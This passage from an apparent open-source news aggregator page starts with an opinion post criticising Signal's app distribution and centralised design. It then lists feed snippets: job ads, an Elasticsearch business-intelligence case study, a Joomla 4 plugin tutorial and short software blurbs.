For the longest time, Signal wouldn’t work without Google Play Services, but Moxie (the founder of Open Whisper Systems and maintainer of Signal) finally fixed this in 2017. There was also a long time when Signal was only available on the Google Play Store. Today, you can download the APK directly from signal.org, but… well, we’ll get to that in a minute.

F-Droid

There’s an alternative to the Play Store for Android. F-Droid is an open source app “store” (repository would be a better term here) which only includes open source apps (which Signal thankfully is). By no means does Signal have to only be distributed through F-Droid - it’s certainly a compelling alternative. This has been proposed, and Moxie has definitively shut the discussion down. Admittedly this is from 2013, but his points and the arguments against them haven’t changed. Let me quote some of his positions and my rebuttals:

No upgrade channel. Timely and automatic updates are perhaps the most effective security feature we could ask for, and not having them would be a real blow for the project.

F-Droid supports updates. If you’re concerned about moving your updates quickly through the (minimal) bureaucracy of F-Droid, you can always run your own repository. Maybe this is a lot of work? I wonder how the workload compares to animated gif search, a very important feature for security conscious users. I bet that 50 million dollar donation could help, given how many people operate F-Droid repositories on a budget of $0.

No app scanning. The nice thing about market is the server-side APK scanning and signature validation they do. If you start distributing APKs around the internet, it’s a reversion back to the PC security model and all of the malware problems that came with it.

Try searching the Google Play Store for “flashlight” and look at the permissions of the top 5 apps that come up. All of them are harvesting and selling the personal information of their users to advertisers. Is this some kind of joke? F-Droid is a curated repository, like Linux distributions. Google Play is a malware distributor. Packages on F-Droid are reviewed by a human being and are cryptographically signed. If you run your own F-Droid repo, this is even less of a concern.

I’m not going to address all of Moxie’s points here, because there’s a deeper problem to consider. I’ll get into more detail shortly. You can read the 6-year-old threads tearing Moxie’s arguments apart over and over again until GitHub added the feature to lock threads, if you want to see a more in-depth rebuttal.

The APK direct download

Last year Moxie added an official APK download to signal.org. He said this was for “harm reduction”, to avoid people using unofficial builds they find around the net. The download page is covered in warnings telling you that it’s for advanced users only, it’s insecure, would you please go to the Google Play store you stupid user. I wonder, has Moxie considered communicating to people the risks of using the Google Play version?

The APK direct download doesn’t even accomplish the stated goal of “harm reduction”. The user has to manually verify the checksum, and figure out how to do it on a phone, no less. A checksum isn’t a signature, by the way - if your government- or workplace- or abusive-spouse-installed certificate authority gets in the way they can replace the APK and its checksum with whatever they want. The app has to update itself, using a similarly insecure mechanism. F-Droid handles updates and actually signs their packages. This is a no brainer, Moxie, why haven’t you put Signal on F-Droid yet?
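
For what it's worth, the verification being asked of users boils down to something like the sketch below (the file name and expected digest are placeholders). Note that the published checksum travels over the same HTTPS channel as the APK, so an attacker with an injected certificate authority can swap both, which is exactly the problem described above:

# Sketch: compare a downloaded APK's SHA-256 against a published value.
import hashlib

def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

expected = "..."  # placeholder: digest copied from the download page
actual = sha256_of("Signal.apk")  # placeholder file name
print("OK" if actual == expected else "MISMATCH - do not install")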

Why is Signal like this?

So if you don’t like all of this, if you don’t like how Moxie approaches these issues, if you want to use something else, what do you do?

Moxie knows about everything I’ve said in this article. He’s a very smart guy and I am under no illusions that he doesn’t understand everything I’ve put forth. I don’t think that Moxie makes these choices because he thinks they’re the right thing to do. He makes arguments which don’t hold up, derails threads, leans on logical fallacies, and loops back around to long-debunked positions when he runs out of ideas. I think this is deliberate. An open source software team reads this article as a list of things they can improve on and gets started. Moxie reads this and prepares for war. Moxie can’t come out and say it openly, but he’s made the decisions he has made because they serve his own interests.

Lots of organizations which are pretending they don’t make self-serving decisions at their customer’s expense rely on argumentative strategies like Moxie does. If you can put together an argument which on the surface appears reasonable, but requires in-depth discussion to debunk, passerby will be reassured that your position is correct, and that the dissenters are just trolls. They won’t have time to read the lengthy discussion which demonstrates that your conclusions wrong, especially if you draw the discussion out like Moxie does. It can be hard to distinguish these from genuine positions held by the person you’re talking to, but when it conveniently allows them to make self-serving plays, it’s a big red flag.

This is a strong accusation, I know. The thing which convinced me of its truth is Signal’s centralized design and hostile attitude towards forks. In open source, when a project is making decisions and running things in a way you don’t like, you can always fork the project. This is one of the fundamental rights granted to you by open source. It has a side effect Moxie doesn’t want, however. It reduces his power over the project. Moxie has a clever solution to this: centralized servers and trademarks.

Trust, federation, and peer-to-peer chat

Truly secure systems do not require you to trust the service provider. This is the point of end-to-end encryption. But we have to trust that Moxie is running the server software he says he is. We have to trust that he isn’t writing down a list of people we’ve talked to, when, and how often. We have to trust not only that Moxie is trustworthy, but given that Open Whisper Systems is based in San Francisco, we have to trust that he hasn’t received a national security letter, too (by the way, Signal doesn’t have a warrant canary). Moxie can tell us he doesn’t store these things, but he could. Truly secure systems don’t require trust.

There are a couple of ways to solve this problem, which can be used in tandem. We can stop Signal from knowing when we’re talking to each other by using peer-to-peer chats. This has some significant drawbacks, namely that both users have to be online at the same time for their messages to be delivered to each other. You can still fall back to peer-to-server-to-peer when one peer is offline, however. But this isn’t the most important of the two solutions.

The most important change is federation. Federated services are like email, in that Alice can send an email from gmail.com to Bob’s yahoo.com address. I should be able to stand up a Signal server, on my own hardware where I am in control of the logs, and communicate freely with other Signal servers, including Open Whisper’s servers. This distributes the security risks across hundreds of operators in many countries with various data extradition laws. This turns what would today be easy for the United States government to break and makes it much, much more difficult. Federation would also open the possibility for bridging the gap with several other open source secure chat platforms to all talk on the same federated network - which would spurn competition and be a great move for users of all chat platforms.

Moxie forbids you from distributing branded builds of the Signal app, and if you rebrand he forbids you from using the official Open Whisper servers. Because his servers don’t federate, that means that users of Signal forks cannot talk to Signal users. This is a truly genius move. No fork of Signal to date has ever gained any traction, and never will, because you can’t talk to any Signal users with them. In fact, there are no third-party applications which can interact with Signal users in any way. Moxie can write as many blog posts which appeal to wispy ideals and “moving ecosystems” as he wants, but those are all really convenient excuses for an argument which allows him to design systems which serve his own interests.

No doubt these are non-trivial problems to solve. But I have personally been involved in open source projects which have collectively solved similarly difficult problems a thousand times over with a combined budget on the order of tens of thousands of dollars.

What were you going to do with that 50 million dollars again?

P.S. If you’re looking for good alternatives to Signal, I can recommend Matrix.


          EPISODE60 - Intro to Cloud Foundry
Learn about the open source Cloud Foundry project that is now a central part of the HP Helion portfolio from the VP of Engineering responsible for the HP Helion Development Platform.
          EPISODE70 - CloudSlang Introduction
Learn about the new open source project; CloudSlang from the HP team in Israel for DevOps automation.
          Guy Martin: Open Source Strategy at Autodesk

Companies today can't get away with not using open source, says Guy Martin, Director, Open@Autodesk, who recently sat down with us for a deep dive into Autodesk's engagement with and contributions to the open source community.

"Like any company...we consume a lot of open source," said Martin, "I was brought in to help Autodesk's open source strategy in terms of how we contribute back more effectively to open source, how we open source code within our environment, which we want to be a standard — code which is non-differentiating and not strategic IP."


          TTJ Wallet (Lifestyle)

TTJ Wallet 1.0.0


Device: iOS Universal
Category: Lifestyle
Price: Free, Version: 1.0.0 (iTunes)

Description:

TTJ Wallet

With this wallet, users can hold or share "SEN Coin" and "Sen Point".
"SEN Coin" and "Sen Point" are digital asset based on Stellar network issued by Truong Thanh Japan.

TTJ Wallet is free and open source software.
Anyone can review TTJ Wallet's source code on GitHub (https://github.com/ttvnp/ttj-asset-ios-client).



          Alexa: Amazon publishes a development kit to integrate its assistant into cars
Named Auto SDK, the open source kit will allow automakers and equipment suppliers to integrate the e-commerce giant's voice assistant into their models.
          LXer: How To Install Git on Debian 9
Published at LXer: This tutorial will show you how to install and configure Git on Debian 9. Git is the world's most popular distributed version control system, used by many open source and...
          Java Developer - IAM - Codeworks - Milwaukee, WI
Experience in J2EE web application development and ability to use open source libraries. Our direct client is seeking a Java Developer with experience in...
From Indeed - Thu, 02 Aug 2018 16:23:50 GMT - View all Milwaukee, WI jobs
          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Java Backend Developer - C4J - Herentals
Are you the mastermind behind simple solutions to complex problems? Do they satisfy both the customer's requirements and the user's? Do you enjoy working in a large-scale, open source environment? Are you a guru for junior developers? Welcome! As a back-end developer you will work with Java, Spring, Hibernate, Jersey, Jackson, Apache CXF, ... to innovate old back-end services and implement new ones. For you, a box has no walls, only an opening to jump out of:...
          Dot Net Training in Bhubaneswar, Dot Net Training Center in Bhubaneswar, Best Dot Net Course in Bhubaneswar. dot net course in Bhubaneswar
Dot Net is an open source technology which is a software framework and has been developed by the best software company in the world i.e. Microsoft. dot net institute in Bhubaneswar, dot net course in Bhubaneswar, best dot net training in Bhubaneswar, Odisha.
          Juveniles From New Import Le Grand: Proclaimed as the Billion Dollar Chicken, first time in U.S. - USD 100.00
Le Grand is known as the billion dollar chicken, we expect it to level the industrial playing field on behalf of the small farmer. From a distance, this stunning bird is easily mistaken for a Black Copper Marans.  A closer look reveals that the Le Grand has been selected for a much heavier frame as well as yellow skin and shanks. Our lines are direct imports from British Columbia and approved by the originator of this open source meat bird.  Le Grand is built for pastoral meat production, but they are also excellent layers of brown eggs and occasional chocolate egg due to the heritage French genetics. These birds breed true and conform closely to Marans, in appearance only.  We regularly hatch very vigorous chicks that typically reach 200 grams in their first week. They will go on to reach 5-6 pounds + by 12-14 weeks. Le Grand chickens have garnered twice the amount of positive feedback regarding taste and texture than our La Bresse chickens, making them the newest contender for the coveted title of North America’s best tasting chicken.  Until now you’ve only been able to get a hybrid version of Cornish cross or freedom ranger
          Open Source Summit Japan 2018 opens: AGL and Hyperledger case studies follow Jim Zemlin's keynote
The Linux Foundation's technical conference Open Source Summit Japan 2018 was held June 20-22, co-located with Automotive Linux Summit Japan 2018. Until a few years ago the conference ran under the name LinuxCon Japan, but as the event and The Linux Foundation's scope expanded into surrounding areas such as cloud and blockchain, it is now held annually under its current name. The keynote on the morning of the 20th began with a talk by Jim Zemlin, Executive Director of The Linux Foundation. This article reports on the first half of that morning's keynotes.
          2009-02-02
iPhone Flash, new Kindle, Google Gears, open source better security
          From Tableau to Elastic: How Samtec Streamlined Business Intelligence & Analytics

Let’s get this out of the way: we’re not the typical Elastic users. While most use Elasticsearch for logging, security, or search; we use Kibana and Elasticsearch for business intelligence across our enterprise from sales to manufacturing. Also, we have applications using Elasticsearch as a primary data store, and our “production” cluster is often running pre-releases to take advantage of the newest functionality. That being so, our origin with Elastic is likely the same as yours — it all started with needing a place to dump a whole bunch of logs.

Samtec builds electrical interconnects found in products ranging from medical devices and servers to self-driving cars. Our group — Smart Platform Group — was born from an area of Samtec that builds high-speed copper and optical interconnects. Samtec’s FireFly™ family of interconnects is a great example. They pack 192 Gbps of bandwidth onto a device the size of a dime.

samtec_1.png

The process to manufacture FireFly™ requires hundreds of steps. Almost every step gets performed by equipment that produces logs containing volumes of data. For example, one step of the process is to place silicon die onto a printed circuit board. The placement gets measured in microns (1/1000th of a millimeter), and the machine that does the placement holds onto each die with a small amount of vacuum pressure. That pressure gets logged for every placement. Those logs look something like this:

"die_count_x" => "integer"
"die_count_y" => "integer"
"commanded_pick_force" => "float"
"actual_pick_force" => "float"
"commanded_place_force" => "float"
"actual_place_force" => "float

We needed to start with capturing the data that would be lost over time as the machines rotated their logs. Logstash, and by extension Elasticsearch, were determined to be the quickest and most cost-effective solution, requiring the least development and maintenance effort. So we wrote some Logstash configs and started dumping data into Elasticsearch. It may not have been pretty, but it worked and we more-or-less forgot about it. That was late 2015.
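
Those original configs aren't public, but the gist of the first step looks something like this sketch using the official Elasticsearch Python client (8.x-style API); the host, index name, and field values are invented for illustration:

# Sketch: index one parsed machine-log record into Elasticsearch.
from datetime import datetime, timezone
from elasticsearch import Elasticsearch

es = Elasticsearch("http://localhost:9200")  # placeholder host

record = {
    "@timestamp": datetime.now(timezone.utc).isoformat(),
    "machine": "die-placer-01",          # invented machine name
    "commanded_pick_force": 1.25,
    "actual_pick_force": 1.19,
}

es.index(index="die-placement-logs", document=record)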

Three months went by, then six, then a year — and the data was never touched. Finally, one fateful day a customer request came in with an early device failure “in the field”. We needed to look back to when that customer’s order was running on a specific machine to see if everything looked normal in the production process.

Cue our first Kibana visualization, a simple line chart showing the force used to pick up that small silicon die. We knew the build date of the device, so we filtered our chart by date and got something similar to the below.

samtec_2.jpg

Each dip in the top line represents a period where the force seems to have dropped suspiciously low. Naturally, we had lots of questions, but the most pressing was: did the device in question get built during one of those periodic dips? The exact times each order and piece got ran was stored in our SQL database, and we needed to bring the two pieces of data together. Each machine had a vastly different data structure, and the logistics of moving them all into SQL seemed problematic. However, moving tabular SQL data into Elasticsearch was a well-documented path with Logstash. So we wrote another Logstash config to bring in the SQL data and leveraged some Kibana-fu to overlay orders and serial numbers onto some time series charts.

samtec_3.jpg

Given the above, it looked like there were a couple of transactions that occurred during a time of “low pick force”. We were going to have to review those in more depth.

What started as one or two Logstash configs was threatening to turn into hundreds as the number of data sources we wanted to pull into Elasticsearch grew. Rather than continue to spend developer time creating Logstash configs, a product idea was born focused on making Elasticsearch data imports more accessible. Moreover, we wanted to enable self-service Business Intelligence using the Elastic Stack.

Enter Conveyor

Conveyor is an open source plugin that we wrote with data analysts and business users in mind. We wanted a graphical, interactive way for loading data into Elasticsearch. We wanted it to be easily extended to support different data sources, and we wanted it to integrate well into the Elastic Stack.

samtec_4.jpg

So now that any data is just a few buttons away from being in Elastic, what kind of possibilities are within an easy reach?

We’ve replaced our Tableau Dashboards with Kibana ones. In this case a heads-up display for showing order status in a manufacturing center. Auto-refresh meant the display showed new orders near real-time.

samtec_5_6_2.png

We’ve used Conveyor to pull in bill of materials and inventory data. We put it all in to Graph to quickly trace suspect lots through manufacturing and to identify other affected lots. In this case, we were able to easily determine customer orders (green circles) that consumed a suspect lot (red circle) even though there was a sub-assembly process that occurred midstream (pink circles).

samtec_7.jpg

We’ve also used Conveyor to pull in process control data and analyzed it for anomalies using Elastic machine learning. In this case, we analyze a metric that gauges the health of a test station — and we can easily identify or be alerted when it isn’t as expected.

samtec_8.jpg

Finally, we use Conveyor and Kibana together to build powerful dashboards on all sorts of business metrics, like GitHub Repository Statistics, for our open source chatbot platform called Articulate to cheer-on the increasing downloads and stars!

samtec_9.jpg

What’s Next

We’ve now been using Elasticsearch as a primary data store for our projects for more than four years, and though we don’t have big data like some users of Elastic, we have broad data. With the introduction of Conveyor, as well as new Kibana functionality like Canvas and Vega visualizations, we strongly believe that the Elastic Stack is the best open source business intelligence platform. To reinforce that, we’ll leave you with three thoughts:

  • Joining disparate data sources in a single analytical tool is extremely powerful and compounds the value of your data.
  • Dynamic mappings and re-index capabilities make Elasticsearch an excellent collect now, analyze later data store.
  • Cross-index search enables powerful information gathering on business data. (Want all sales orders, shipments, and contacts for a customer? Just search for their name across multiple indices).
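
As a sketch of that last point, the Python client accepts a comma-separated index list, so a single query can span several indices at once (the index names and customer value are invented):

# Sketch: one search across several indices.
from elasticsearch import Elasticsearch

es = Elasticsearch("http://localhost:9200")  # placeholder host

resp = es.search(
    index="orders,shipments,contacts",
    query={"match": {"customer": "Acme Corp"}},
)
for hit in resp["hits"]["hits"]:
    print(hit["_index"], hit["_id"], hit["_score"])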

We hope to be back to share more in-depth walkthroughs on using Conveyor with Vega and Canvas, as well as our experience with the new Elastic User Interface (EUI) library. We’re happy to share our experiences, so keep an eye out for those here or on our site at https://blog.spg.ai. Also, be sure to check out Conveyor.


Caleb Keller, Woo Ee, and Mike Lutz head a team of data lovers, tinkerers, and technology enthusiasts building open-source solutions for Samtec's Smart Platform Group


          Silvano Mello: Dose of hope
https://www.aneddoticamagazine.com/wp-content/uploads/Silvano-Mello-Dose-of-hope.jpg

Aneddotica Magazine - Collaborative Blog since 2012 https://www.aneddoticamagazine.com/silvano-mello-dose-of-hope/
          OpenDrop V3 Digital Microfluidics Platform
https://www.aneddoticamagazine.com/wp-content/uploads/maxresdefault-274.jpg

OpenDrop is an open source digital microfluidics platform. Reservoirs allow the chip to be supplied with liquids and to separate out drops of the same size. OpenDrop is a development within the Digital Biology Ecosystem.


OpenDrop Digital Microfluidic Platform: http://www.gaudi.ch/OpenDrop

New computer software written in the Processing language allows the easy design and control of patterns and protocols on the device.


Aneddotica Magazine - Collaborative Blog since 2012 https://www.aneddoticamagazine.com/opendrop-v3-digital-microfluidics-platform/
          Four Thieves Vinegar: Make your own medicine
https://www.aneddoticamagazine.com/wp-content/uploads/Four-Thieves-Vinegar.jpeg

Free Medicine for Everyone.


People are disenfranchised from access to medicine for various reasons. To circumvent these, we have developed a way for individuals to manufacture their own medications. We have designed an open-source automated lab reactor, which can be built with off-the-shelf parts, and can be set to synthesize different medications. This will save hundreds of thousands of lives.


The main reasons people are disenfranchised from medicines are price, legality, and lack of infrastructure. Medicines like Sovaldi, which costs $80,000 for a course of treatment, are beyond the reach of most people. Mifepristone and Misoprostol are unavailable in many places where abortion is illegal. Antiretroviral HIV treatments, even when provided free, have no way of getting to remote locations in third-world countries.


The design will be published online, along with synthesis programs. The system will also have a forum system for users to communicate and contribute to the development of the system. With time, the system will become self-sustaining, much like other open source movements.


https://fourthievesvinegar.org
Aneddotica Magazine - Collaborative Blog since 2012 https://www.aneddoticamagazine.com/four-thieves-vinegar-make-your-own-medicine/
          PostgreSQL 10.5
PostgreSQL is a powerful, open source object-relational database system. It has more than 15 years of active development and a proven architecture that has earned it a strong reputation for reliability, data integrity, and correctness. It is fully A...
          Facebook Script | Social Network Script - Chennai, India
Simple Facebook Script with a new professional look, highly advanced options, and customization on an open source PHP platform, making the site more reliable and robust for users. Choose our script; it is not only used as the Social Networ...
          Social Mapper: This Open Source Tool Lets “Good” Hackers Track People On Social Media

There are tons of automated tools and services that any shady hacker can employ to grab the public data on Facebook, Twitter, Google, or Instagram, and use it for nefarious purposes. But what about the ethical hackers and security researchers who are looking for a means to achieve the same? To tackle this issue, security […]

The post Social Mapper: This Open Source Tool Lets “Good” Hackers Track People On Social Media appeared first on Fossbytes.


          The Soviet Symphonist

The Shostakovich story — man and music in the apocalypse of world war and Cold War — seems to get more frightfully irresistible with every remembrance, every new CD in the Boston Symphony’s Grammy winning ...

The post The Soviet Symphonist appeared first on Open Source with Christopher Lydon.


          Strawberry: Quality sound, open source music player

I recently received an email from Jonas Kvinge who forked the Clementine open source music player. Jonas writes:
          Google Boots Open Source Anti-Censorship Tool From Chrome Store

A browser extension that acted as an anti-censorship tool for 185,000 people has been kicked out of the Chrome store by Google. The open source Ahoy! tool facilitated access to more than 1,700 blocked sites but is now under threat. Despite several requests, Google has provided no reason for its decision.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.


          UX Developer Lead, Themes - Shopify - Montréal, QC
We champion Slate, an open source development tool, and work with our colleagues across the Online store channel to shape the development of new platform...
From Shopify - Tue, 10 Jul 2018 20:00:27 GMT - View all Montréal, QC jobs
          Full Stack Engineer, Axon Records - Axon - Seattle, WA
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Mon, 06 Aug 2018 23:18:47 GMT - View all Seattle, WA jobs
          Senior Front End Engineer, Intelligent Operating Network - Axon - Seattle, WA
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Fri, 20 Jul 2018 23:17:40 GMT - View all Seattle, WA jobs
          Senior Back End Engineer, Axon Records - Axon - Seattle, WA
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Mon, 16 Jul 2018 05:18:50 GMT - View all Seattle, WA jobs
          Back End Engineer, Axon Records - Axon - Seattle, WA
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Tue, 12 Jun 2018 23:18:07 GMT - View all Seattle, WA jobs
          Software Engineering Manager, Axon Records - Axon - Seattle, WA
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Thu, 31 May 2018 23:18:10 GMT - View all Seattle, WA jobs
          Senior Full Stack Engineer, Axon Records - Axon - Seattle, WA
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Thu, 24 May 2018 23:18:05 GMT - View all Seattle, WA jobs
          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          Audacious 3.10.0
Audacious is an open source audio player. A descendant of XMMS, Audacious plays your music how you want it, without using much CPU resource.
          J4.x:Creating a Plugin for Joomla/fa      Cache   Translate Page   Web Page Cache   

Created page with "Using plugins in your code"

New page

<noinclude><languages /></noinclude>
{{Top portal heading|color=white-bkgd|icon=magic|icon-color=#5091cd|size=3x|text-color=#333|title=Tutorial<br />
How to create a Plugin for Joomla 4}}
<noinclude>{{Joomla version|version=4.x|comment=series}}</noinclude>
{{-}}
The plugin structure for Joomla! 1.5, 2.5 and 3.x was very flexible and powerful. Not only can plugins be used to handle events triggered by the core application and extensions, but plugins can also be used to make third party extensions extensible and powerful. In Joomla 4.x we have rewritten a lot of the dispatcher system behind this to increase the flexibility further when you modify the parameters passed as events whilst simultaneously increasing the performance of plugins.

This How-To should provide you with the basics of what you need to know to develop your own plugin. Most plugins consist of just a single code file but to correctly install the plugin code it must be packaged into an installation file which can be processed by the Joomla installer.

=== Creating the Installation File ===
As with all extensions in Joomla, plugins are easily installed as a .zip file (.tar.gz is also supported) but a correctly formatted XML file must be included. <br />
As an example, here is the XML installation file for the categories search plugin:

<source lang="xml">
<?xml version="1.0" encoding="utf-8"?>
<extension version="3.1" type="plugin" group="search" method="upgrade">
<name>plg_search_categories</name>
<author>Joomla! Project</author>
<creationDate>November 2005</creationDate>
<copyright>Copyright (C) 2005 - 2018 Open Source Matters. All rights reserved.</copyright>
<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>3.0.0</version>
<description>PLG_SEARCH_CATEGORIES_XML_DESCRIPTION</description>
<files>
<filename plugin="categories">categories.php</filename>
</files>
<languages>
<language tag="en-GB">en-GB.plg_search_categories.ini</language>
<language tag="en-GB">en-GB.plg_search_categories.sys.ini</language>
</languages>
<config>
<fields name="params">

<fieldset name="basic">
<field
name="search_limit"
type="number"
label="JFIELD_PLG_SEARCH_SEARCHLIMIT_LABEL"
default="50"
/>

<field
name="search_content"
type="radio"
class="switcher"
label="JFIELD_PLG_SEARCH_ALL_LABEL"
default="0"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>

<field
name="search_archived"
type="radio"
class="switcher"
label="JFIELD_PLG_SEARCH_ARCHIVED_LABEL"
default="0"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
</fieldset>

</fields>
</config>
</extension>
</source>

As you can see, the system is similar to other Joomla XML installation files. You only have to look out for the <tt>group="xxx"</tt> entry in the <tt><extension></tt> tag and the extended information in the <tt><filename></tt> tag. This information tells Joomla into which folder to copy the file and to which group the plugin should be added.

If you are creating a plugin that responds to existing core events, the <tt>group="xxx"</tt> attribute would be changed to reflect the name of existing plugin folder for the event type you wish to augment. e.g. <tt>group="authentication"</tt> or <tt>group="user"</tt>. See [[S:MyLanguage/Plugin/Events|Plugin/Events]] for a complete list of existing core event categories. In creating a new plugin to respond to core events it is important that your plugin's name is unique and does not conflict with any of the other plugins that may also be responding to the core event you wish to service as well.

If you are creating a plugin to respond to non-core system events your choice for the <tt>group="xxx"</tt> tag should be different than any of the existing core categories.

'''TIP:''' ''If you add the attribute <tt>method="upgrade"</tt> to the tag <tt>extension</tt>, this plugin can be installed without uninstalling an earlier version. All existing files will be overwritten, but old files will not be deleted.''

=== Creating the Plugin ===
The object-oriented way of writing plugins involves writing a subclass of [https://api.joomla.org/cms-4/classes/Joomla.CMS.Plugin.CMSPlugin.html CMSPlugin], a base class that implements the basic properties of plugins. In your methods, the following properties are available:

* <tt>$this->params</tt>: the [[S:MyLanguage/Parameter|parameters]] set for this plugin by the administrator
* <tt>$this->_name</tt>: the name of the plugin
* <tt>$this->_type</tt>: the group (type) of the plugin
* <tt>$this->db</tt>: the db object
* <tt>$this->app</tt>: the application object

'''TIP:''' ''To use <tt>$this->db</tt> and <tt>$this->app</tt>, <tt>CMSPlugin</tt> tests if the property exists and is not private. If it is desired for the default objects to be used, create un-instantiated properties in the plugin class (i.e. <tt>protected $db; protected $app;</tt> in the same area as <tt>protected $autoloadLanguage = true;</tt>). The properties will not exist unless explicitly created.''

In the following code example, <tt><PluginGroup></tt> represents the group (type) of the plugin, and <tt><PluginName></tt> represents its name. Note that class and function names in PHP are case-insensitive.

We also implement the [https://api.joomla.org/framework-2/classes/Joomla.Event.SubscriberInterface.html SubscriberInterface] here, which is the major change from Joomla 1.5-3.x. Instead of the function name automatically being detected and being the same as the event name, this allows you to have custom function names. This allows us to tell which plugins implement which functions and, because parsing public methods in PHP code is slow, gives a significant performance boost.

Note throughout the Joomla 4 series there is a deprecated layer that will cover plugins using the old naming strategy of plugin names being the same as the event name when SubscriberInterface is not implemented.

<source lang="php">
<?php
// no direct access
defined( '_JEXEC' ) or die;

use Joomla\CMS\Plugin\CMSPlugin;
use Joomla\CMS\Event\Event;
use Joomla\Event\SubscriberInterface;

class Plg<PluginGroup><PluginName> extends CMSPlugin implements SubscriberInterface
{
/**
* Load the language file on instantiation
*
* @var boolean
* @since 3.1
*/
protected $autoloadLanguage = true;

/**
* Returns an array of events this subscriber will listen to.
*
* @return array
*/
public static function getSubscribedEvents(): array
{
return [
'<EventName>' => 'myFunctionName',
];
}

/**
* Plugin method is the array value in the getSubscribedEvents method
* The plugin then modifies the Event object (if it's not immutable)
*/
public function myFunctionName(Event $event)
{
/*
* Plugin code goes here.
* You can access parameters via $this->params
*/
return true;
}
}
?>
</source>

=== Using Plugins in Your Code ===
If you are creating a plugin for a new, non-core event, remember to activate your plugin after you install it. Precede any reference to your new plugin with the <tt>JPluginHelper::importPlugin()</tt> command.
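
For example, a minimal sketch of loading a custom group before dispatching to it (the group name "myextension" is hypothetical; PluginHelper is the namespaced Joomla 4 equivalent of JPluginHelper):

<source lang="php">
use Joomla\CMS\Plugin\PluginHelper;

// Load all enabled plugins of the (hypothetical) "myextension" group
// so their subscribed events can fire when an event is dispatched later.
PluginHelper::importPlugin('myextension');
</source>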

Now that you've created your plugin, you will probably want to call it in your code. You might not: the Joomla core has a number of built-in events that you might want your plugin code to be registered to (and in that case you can ignore this section).

==== New Joomla 4 Way ====
The new way of doing this in Joomla 4 is to get the dispatcher and dispatch a named event.

<source lang="php">
use Joomla\CMS\Event\AbstractEvent;
use Joomla\CMS\Factory;

$dispatcher = Factory::getApplication()->getDispatcher();

// Here we create an event however as long as you implement EventInterface you can create your own
// custom classes
$event = AbstractEvent::create(
'<EventName>',
[
'name' => $value,
]
);

$eventResult = $dispatcher->dispatch('<EventName>', $event);
</source>

If you want to allow the user to modify values, you can then use the event result and get the results back out of it. As an example of a custom event class, you can look at the following:

<source lang="php">
defined('_JEXEC') or die;

use BadMethodCallException;
use Joomla\CMS\Event\AbstractImmutableEvent;
use Joomla\CMS\Table\TableInterface;

/**
* Event class for an event
*/
class MyCustomEvent extends AbstractImmutableEvent
{
/**
* Constructor.
*
* @param string $name The event name.
* @param array $arguments The event arguments.
*
* @throws BadMethodCallException
*/
public function __construct($name, array $arguments = array())
{
if (!array_key_exists('myProperty', $arguments))
{
throw new BadMethodCallException("Argument 'myProperty' is required for event $name");
}

parent::__construct($name, $arguments);
}

/**
* Setter for the myProperty argument
*
* @param mixed $value The value to set
*
* @return mixed
*
* @throws BadMethodCallException if the argument is not of the expected type
*/
protected function setMyProperty($value)
{
if (!empty($value) && !is_object($value) && !is_array($value))
{
throw new BadMethodCallException("Argument 'src' of event {$this->name} must be empty, object or array");
}

return $value;
}
}
</source>

Why have we introduced this named class over parameters? It makes it easier to introduce custom setters and getters for properties - currently a plugin can completely change a property as it wants, and for a component there's no way of imposing any limitations. Additionally it makes it much easier for developers to add and remove parameters in an event without having major b/c issues (as you are now calling defined methods and are not subject to a property being the 2nd argument of your function).

==== How to achieve maximum compatibility with Joomla 3 ====
If you want to trigger an event in a similar way to the removed J3.x JEventDispatcher then you use code like this:

<source lang="php">
$results = JFactory::getApplication()->triggerEvent( '<EventName>', <ParameterArray> );
</source>

It is important to note that the parameters have to be in an array. The plugin function itself will get the parameters as an Event object if it implements the SubscriberInterface, and as individual values if it does not, but this method will always return an array of the values returned by the plugins.

Note that if ANY plugin in a group doesn't implement the SubscriberInterface, then the result property (as both a named parameter and the result from a plugin) is treated as a special property and cannot be used.


<noinclude>
[[Category:Tutorials{{#translation:}}]]
[[Category:Plugin Development{{#translation:}}]]
[[Category:Development{{#translation:}}]]
[[Category:Joomla!_4.x{{#translation:}}]]
</noinclude>

          J4.x:Creating a Plugin for Joomla/fr      Cache   Translate Page   Web Page Cache   

Created page with "Create a plugin for Joomla"

          Getting started with Postfix, an open source mail transfer agent      Cache   Translate Page   Web Page Cache   

Here's how to set up and install Postfix to send mail through Gmail using two-factor authentication.


          Java Developer - IAM - Codeworks - Milwaukee, WI      Cache   Translate Page   Web Page Cache   
Experience in J2EE web application development and ability to use open source libraries. Our direct client is seeking a Java Developer with experience in...
From Indeed - Thu, 02 Aug 2018 16:23:50 GMT - View all Milwaukee, WI jobs
          tf-nightly-gpu 1.11.0.dev20180810      Cache   Translate Page   Web Page Cache   
TensorFlow is an open source machine learning framework for everyone.
          tf-nightly 1.11.0.dev20180810      Cache   Translate Page   Web Page Cache   
TensorFlow is an open source machine learning framework for everyone.
          Strawberry: Quality sound, open source music player      Cache   Translate Page   Web Page Cache   

I recently received an email from Jonas Kvinge who forked the Clementine open source music player. Jonas writes:

